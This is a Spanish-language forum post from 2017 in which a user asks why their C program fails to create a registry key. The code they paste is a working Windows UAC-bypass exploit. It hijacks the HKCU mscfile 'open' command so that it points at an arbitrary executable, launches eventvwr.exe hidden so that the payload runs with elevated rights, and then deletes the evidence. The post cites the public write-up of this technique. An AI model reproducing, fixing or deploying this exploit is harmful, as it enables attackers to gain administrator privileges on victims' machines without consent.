crear regla registro (no me lo hace) programa en c

Iniciado por Borito30, 1 Febrero 2017, 20:10 PM

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario

Borito30

1 Febrero 2017, 20:10 PM Ultima modificación: 2 Febrero 2017, 18:15 PM por Ragaza
no me crea la regla en registro
Código [Seleccionar]
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

/*
* Pretty standard code to recursively nuke a Reg Key
*/

int RegDelnodeRecurse (LPTSTR lpSubKey) {
   LPTSTR lpEnd;
   LONG lResult;
   DWORD dwSize = MAX_PATH;
   TCHAR szName[MAX_PATH];
   HKEY hKey;
   FILETIME ftWrite;

   lResult = RegDeleteKey(HKEY_CURRENT_USER, lpSubKey);

   if (lResult == ERROR_SUCCESS) return 1;

   lResult = RegOpenKeyEx(HKEY_CURRENT_USER, lpSubKey, 0, KEY_READ, &hKey);

   if (lResult != ERROR_SUCCESS) return lResult == ERROR_FILE_NOT_FOUND;

   lpEnd    = lpSubKey + lstrlen(lpSubKey);
   *lpEnd++ = '\\';
   *lpEnd   = '\0';

   if (RegEnumKeyEx(hKey, 0, szName, &dwSize, 0, 0, 0, &ftWrite) == ERROR_SUCCESS) {
       do {
           strcpy(lpEnd, szName);
           if (!RegDelnodeRecurse(lpSubKey)) break;
           lResult = RegEnumKeyEx(hKey, 0, szName, &dwSize, 0, 0, 0, &ftWrite);
       } while (lResult == ERROR_SUCCESS);
   }

   lpEnd--;
   *lpEnd = TEXT('\0');

   RegCloseKey(hKey);

   return RegDeleteKey(HKEY_CURRENT_USER, lpSubKey) == ERROR_SUCCESS;
}

/*
* Wrapper for above
*/

int RegDelnode() {
   TCHAR szDelKey[MAX_PATH*2] = "Software\\Classes\\mscfile";
   return RegDelnodeRecurse(szDelKey);
}

void __c_UAC() {
   char curPath[MAX_PATH], evtVwr[MAX_PATH];
   HKEY attackKey;
   SHELLEXECUTEINFO exInfo;

   GetCurrentDirectory(MAX_PATH, curPath);
   strcat(curPath, "\\foobar.exe");


   sprintf(evtVwr, "%s\\System32\\eventvwr.exe", getenv("SYSTEMROOT"));

   if(!RegDelnode()) return;
   if(RegCreateKey(HKEY_CURRENT_USER, "Software\\Classes\\mscfile\\shell\\open\\command", &attackKey)!=ERROR_SUCCESS) return;

   RegSetValueEx(attackKey, "", 0, REG_SZ, curPath, strlen(curPath));

   exInfo.lpVerb       = "open";
   exInfo.lpFile       = evtVwr;
   exInfo.nShow        = 0;
   exInfo.fMask        = SEE_MASK_NOCLOSEPROCESS;
   exInfo.cbSize       = sizeof(SHELLEXECUTEINFO);
   exInfo.hwnd         = 0;
   exInfo.lpParameters = 0;
   exInfo.lpDirectory  = 0;
   exInfo.hInstApp     = 0;

   ShellExecuteEx(&exInfo);

   Sleep(5000);

   TerminateProcess(exInfo.hProcess, 0);

   RegCloseKey(attackKey);
   RegDelnode();
}

int main(int argc, char *argv[]) {
   __c_UAC();
   return 0;
}

captura:


Referencia:
https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/

Como podeis ver no estoy muy familiarizado con c. En c++ me resulta mas facil pero como esta programado en c no logro como hacerlo correctamente.
Estoy en contra del foro libre y la Sección de juegos y consolas (distraen al personal)
Imprimir
Ir Arriba Páginas1
Acciones del Usuario